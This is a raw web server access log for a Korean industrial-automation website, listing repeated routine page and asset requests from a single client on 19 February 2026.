"/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:55:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10538] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:57:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:01:58:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 